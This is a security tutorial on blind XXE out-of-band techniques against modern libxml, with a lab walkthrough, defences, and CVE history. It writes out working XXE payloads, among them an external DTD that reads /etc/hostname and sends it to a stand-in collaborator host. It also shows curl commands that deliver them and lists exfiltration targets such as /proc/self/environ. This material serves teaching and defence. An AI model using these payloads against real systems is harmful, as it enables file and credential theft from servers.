Blind XXE OOB on Modern libxml: What Still Works in 2026

Blind XXE is the variant of XML External Entity injection where the application parses the attacker's XML, never reflects any field back, and returns a flat OK regardless of what the parser found. The bug is real, the response body is silent, and the only way I prove anything is by forcing the parser to make a side-channel network request to a host I control. Against modern libxml the picture is split in two: the direct external-entity OOB probe still fires, the textbook recursive parameter-entity DTD chain that every older write-up demonstrates does not. This article walks both, against a Dockerised lab, on the parser PHP 8.2 actually ships.

TL;DR

A blind XXE endpoint parses attacker XML and returns nothing useful in the response body. To prove the bug exists I need an out-of-band channel: a host I control whose access log or DNS log captures requests the vulnerable parser issues on my behalf. Two payload shapes matter. The direct external-entity reference puts an HTTP URL in a general entity's SYSTEM value and references the entity in the document body; libxml fetches the URL while resolving the entity, my collaborator logs the GET, the bug is proven. This still fires on libxml 2.9.14 (PHP 8.2). The recursive parameter-entity chain via an external DTD, the pattern every PortSwigger walk-through uses to exfiltrate file contents through a second-stage GET, does not fire end to end on modern libxml: the DTD loads, the second-stage request never lands. Both patterns are worth knowing because plenty of production parsers are not modern libxml. Burp Collaborator and Interactsh are the listener side; the technique is identical regardless of which one I pick.

Why blind XXE matters when in-band reflection does not work

A lot of endpoints parse XML and never echo any field back. Webhook receivers, async importers, SAML metadata consumers, SOAP services with a generic "accepted" envelope, document upload pipelines that queue the parse and respond before the worker runs. The textbook in-band XXE demo, where I read /etc/passwd straight out of the HTTP response, assumes the application surfaces parsed content. Half the XXE-shaped endpoints I look at do not.

That does not mean those endpoints are safe. If the parser still dereferences external entities, the side effect of parsing is an outbound request from inside the application's network position. That side effect is the bug. A successful collaborator hit is the difference between "we suspect this parser is misconfigured" and "we have a packet that says it is", and even when file-content exfil is closed off by hardening, the OOB primitive is still a usable SSRF gadget against internal HTTP services that the attacker cannot reach directly.

The two payload shapes that matter

Direct external-entity reference (fires on libxml 2.9.14)

The minimal OOB probe. A single <!ENTITY> declaration in the inline DOCTYPE, a SYSTEM URI pointing at my collaborator, and a reference to that entity somewhere in the document body so the parser is forced to resolve it:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://collab.example/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

When the parser walks the tree and hits &exfil;, it dereferences the SYSTEM URI to resolve the entity's substitution text. libxml issues an outbound HTTP GET to collab.example/?leak=fired. The collaborator logs the request. The application's response can be a literal OK and the bug is still proven.

What this payload does not do is exfiltrate file content. There is no way to bake /etc/passwd into the query string through a single general entity; the substitution layer that would let me do that is the parameter-entity layer in the next section, and that is where the hardening lives. Direct OOB proves the primitive and confirms egress. For SSRF gadgets that is already enough.

Recursive parameter entity in an external DTD (does not fire on libxml 2.9.14)

This is the textbook chain. Older PortSwigger labs, older write-ups, and most XXE training material build OOB up through this pattern, because it is the one that does exfiltrate file content when it works.

The inline DOCTYPE loads a remote DTD via a parameter entity and forces the parameter entity to expand:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://collab.example/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

The remote evil.dtd reads a local file into one parameter entity, then uses a second parameter entity to declare a third general or parameter entity whose SYSTEM URI embeds the first file's contents in its query string, then forces that third entity to resolve so the contents leave the host in the query string of a second outbound request:

code

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collab.example/?x=%file;'>">
%eval;
%exfil;

Against an older libxml this chain runs end to end: the DTD loads, the file is read, the second GET arrives at the collaborator with the file's contents in the URL. Against modern libxml only the first step fires. The collaborator sees GET /evil.dtd, the second request never lands, the bytes never leave.

What libxml actually changed

The full timeline lives in the parent article on XML External Entity injection. The two checkpoints that matter for blind OOB:

libxml 2.9.0 (September 2012) flipped external-entity loading off by default. Callers have to opt back in with XML_PARSE_NOENT (in C) or LIBXML_NOENT (in PHP). Every textbook XXE payload from before 2013 assumed external entities loaded by default; from 2013 onward, blind XXE requires an application that has explicitly turned the feature back on. Plenty of real production code does, usually because someone needed DTD-based validation and turned everything on rather than just LIBXML_DTDLOAD.

libxml 2.9.x parameter-entity hardening (2014 onward). The 2.9.x line tightened how parameter entities loaded from an external DTD interact with subsequent entity definitions. libxml now refuses to define a new entity inside the expansion of a parameter entity loaded from an external DTD, which is the exact mechanic the recursive chain depends on. The change rolled out incrementally across 2.9.4, 2.9.10, and the subsequent point releases. By 2.9.14 (the libxml PHP 8.2 ships), the recursive PE-DTD chain is closed.

Today's production stacks land in three buckets: PHP 8.2 / 8.3 and modern Python lxml on libxml 2.9.14 close the recursive chain but leave direct OOB intact; Java DocumentBuilder behaviour depends on the JDK and whether FEATURE_SECURE_PROCESSING is set, and many enterprise SAML and SOAP servers still have both patterns working; legacy on-prem appliances and anything statically linking pre-2.9.4 libxml are fully exposed, file-content exfil and all.

Lab walkthrough

The xxe-basic lab in the techearl-labs repo ships PHP 8.2 with libxml 2.9.14 and parses incoming XML with LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA. That is the unsafe combination: external entities are substituted, the inline DOCTYPE is allowed to dereference SYSTEM URIs, XInclude is opted into on a separate endpoint. The blind endpoint is /upload-blind.php and returns OK regardless of what the parser found.

Boot it:

bash

docker compose up xxe-basic

The companion xxe-basic-collab container is a tiny Python HTTP server on the same Docker network with no published port; only the lab can reach it. It serves evil.dtd and logs every request to stdout. Tail it in a second terminal:

bash

docker compose logs -f xxe-basic-collab

Pattern 1: direct entity OOB fires

Save the direct-entity payload to payload-direct.xml (note that the URL points at the collaborator inside the Docker network, not at a public collaborator):

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>

POST it to the blind endpoint:

bash

curl -s -X POST --data-binary @payload-direct.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php

The application returns OK. The collaborator log shows a line of the shape:

code

[collab] GET from 172.18.0.3 path=/?leak=fired

That GET is the OOB primitive firing. The parser dereferenced the external entity by issuing an outbound HTTP request to a host the attacker controls, while the application's response gave nothing away.

Pattern 2: recursive PE-DTD chain does not fire

The textbook chain, saved to payload-recursive.xml:

xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<bookmarks>
  <bookmark><name>x</name><url>http://x</url></bookmark>
</bookmarks>

The evil.dtd on the collaborator reads /etc/hostname and declares a second-stage exfil entity that embeds the content in a query string. POST it:

bash

curl -s -X POST --data-binary @payload-recursive.xml \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php

The collaborator log shows exactly one line:

code

[collab] GET from 172.18.0.3 path=/evil.dtd

The DTD loaded. The second-stage GET that was supposed to carry the file contents never arrives. That gap is the libxml 2.9.x hardening at work. The same payload against libxml 2.9.3 produces a second GET with the hostname in its query string.

A clean negative on the recursive pattern does not mean "no XXE here", just "no XXE through this chain on this parser". Try the direct-entity probe first, fall back to XInclude, and only then conclude the parser is hardened.

Setting up an external collaborator

The lab uses an in-network collaborator container to keep everything offline. Against a real target you need a host whose DNS or HTTP logs you can read. The realistic options are Burp Collaborator (PortSwigger's hosted service, bundled with Burp Pro), Interactsh (ProjectDiscovery's open-source equivalent, hosted at oast.fun or self-hostable on a VPS with an NS-delegated subdomain), and browser-accessible loggers like dnslog.cn, requestbin.com, oast.live, or webhook.site for one-off probes. The probe pattern is identical regardless of which one you pick: put the collaborator's hostname in the SYSTEM URI of the entity, send the payload, watch the listener.

What you can exfiltrate

The direct-entity primitive on a modern libxml proves the parser is misconfigured, confirms outbound HTTP egress (the same primitive that powers cloud-metadata SSRF), and surfaces any fields the application appended to the URL (a templated Host header, a customer ID in the path) that you did not write yourself.

The recursive PE-DTD chain, when it works against older parsers or badly-configured Java SAML, gives you file contents via file:///etc/passwd, file:///etc/hostname, the application's own config files, and environment variables through file:///proc/self/environ on Linux. The environ read is where credentials leak: cloud keys, database passwords, signing secrets, whatever the application read at startup. On Java parsers that allow it, the jar:// and netdoc:// URL schemes extend the reach further. On PHP with stream wrappers enabled, php://filter bypasses character-set issues with binary file reads.

The fix

The defence is the same as for the parent class, repeated here so this article stands on its own:

Disable external entity resolution on every XML parser that touches untrusted input. In PHP, do not pass LIBXML_NOENT and do not pass LIBXML_DTDLOAD to loadXML. The defaults since libxml 2.9.0 are correct.
In Java, set XMLConstants.FEATURE_SECURE_PROCESSING on every DocumentBuilderFactory, SAXParserFactory, XMLInputFactory, and TransformerFactory, plus the disallow-doctype-decl, external-general-entities, external-parameter-entities, and load-external-dtd features set to the safe values. The OWASP XXE Prevention Cheat Sheet has the full list.
In .NET, use XmlReaderSettings { DtdProcessing = Prohibit, XmlResolver = null }.
In Python, use defusedxml for stdlib parsers, and configure lxml with XMLParser(resolve_entities=False, no_network=True, load_dtd=False).
Prefer JSON for new APIs. JSON parsers have no entity-resolution layer; the class is closed off by construction.
Default-deny outbound HTTP and outbound DNS at the application VPC layer. No egress means no OOB. The detection signal that catches blind SSRF (alerting on outbound DNS queries to unusual TLDs from services that have no business resolving external domains) catches blind XXE for the same reasons. See the detection notes in blind SSRF.

Real-world incidents

XXE-OOB has a long CVE history. Three that are worth knowing:

CVE-2018-8033 in Apache OFBiz. The SOAPEventHandler (and the related XML-RPC surface) parsed user-supplied XML with external entities enabled, giving an unauthenticated attacker the direct external-entity OOB primitive against any internet-exposed OFBiz instance before 16.11.04. The pattern repeats across Java middleware wherever an XML-RPC or SOAP endpoint has not been touched since the parser defaults were unsafe.
The 2014 Facebook XXE reported by Reginaldo Silva (writeup). The canonical OOB-XXE-to-RCE escalation: Silva used PHP's expect:// stream wrapper to turn an XXE primitive into a shell on Facebook's parser host. The OOB confirmation was the first signal; the wrapper was the escalation. The lesson Facebook's payout encoded is that an XXE finding is never just "information disclosure", because the primitive composes with whatever stream wrappers the parser supports.
Mid-2010s enterprise XXE drip. Confluence, Jenkins, various Atlassian and Cisco products filed a steady run of XXE CVEs whose XML parsers were configured in 2010 and never revisited. Most were OOB-confirmed in disclosure write-ups even when the public fix notes describe the impact as "information disclosure". The takeaway: XXE rarely appears in greenfield code, frequently survives in legacy SOAP and SAML endpoints, and the OOB primitive is usually the first signal that something is wrong.

libxml's 2.9.x line tightened parameter-entity processing across several point releases. The chain depends on defining a new entity inside the expansion of a parameter entity that was loaded from an external DTD, and modern libxml refuses to do that. The DTD still loads, but the second-stage entity that was supposed to carry the file contents in its SYSTEM URI never gets defined, so the second outbound HTTP request never lands. The direct external-entity probe does not depend on that mechanic and still fires.

Yes. Plenty of production XML stacks are not modern libxml. Enterprise SAML and SOAP servers running older JDKs, on-prem appliances that statically link libxml versions from before 2.9.4, anything in a long-lived Linux distribution whose system libxml has not been bumped. The recursive chain is still the right payload to try first against those, because it is the one that exfiltrates file content rather than just proving the primitive.

No. DNS-only setups exfil through subdomain queries: encode the value into a subdomain under a collaborator domain you control, force the parser to resolve a hostname like file-contents.abc123.oast.fun, and read the leaked value out of the authoritative DNS log. DNS-OOB is dominant in production because outbound DNS is almost never blocked even when outbound HTTP is.

No. TLS-pinning is a client-side control: it stops a malicious certificate from impersonating a known endpoint. The XXE-OOB primitive is the parser opening a fresh outbound connection to an attacker-chosen URL, with no expectation of pinning. The parser is its own HTTP client and trusts whatever certificate the collaborator presents. The defence against OOB is at the egress layer (default-deny outbound from application hosts) and at the parser-configuration layer (disable external entity resolution), not at TLS.

Outbound HTTP egress logs from the application host are the first place to look: a fetch from the application to an external host it has no business contacting, especially with a path or query string that looks like exfil under unusual TLDs (.oast.fun, .interactsh.com), is the signature. Outbound DNS query logs catch the DNS-OOB variant. Incoming request bodies with DOCTYPE declarations and SYSTEM URI references are unusual outside of well-defined SOAP traffic.

Where to go next

The parent article on XML External Entity injection covers the in-band file-read variant, XInclude (the entirely separate code path that bypasses entity-based defences), billion-laughs DoS, and the per-language hardening for Java, .NET, Python, and Go. The sibling variant on blind SSRF covers the OOB primitives and the detection layer in more depth, including the random-subdomain DNS detection signal that catches both classes. The hub page is the web application security vulnerabilities taxonomy.

Blind XXE Out-of-Band: What Still Fires on Modern libxml

TL;DR

Why blind XXE matters when in-band reflection does not work

The two payload shapes that matter

Direct external-entity reference (fires on libxml 2.9.14)

Recursive parameter entity in an external DTD (does not fire on libxml 2.9.14)

What libxml actually changed

Lab walkthrough

Pattern 1: direct entity OOB fires

Pattern 2: recursive PE-DTD chain does not fire

Setting up an external collaborator

What you can exfiltrate

The fix

Real-world incidents

Where to go next

Sources

Ishan Karunaratne

Related posts

find Command Cheat Sheet: Search, Filter, and -exec Examples

eval() Injection: The Sink That Still Ships in 2026

How to Lock and Unlock a User Account on Linux

Why does the recursive PE-DTD pattern not fire on modern libxml?

Can I still use the recursive pattern against older parsers?

Is HTTP outbound from the parser the only OOB channel?

Does TLS-pinning on the collaborator help the defender?

How do I tell from logs whether an XXE-OOB attempt fired?

Sources

Ishan Karunaratne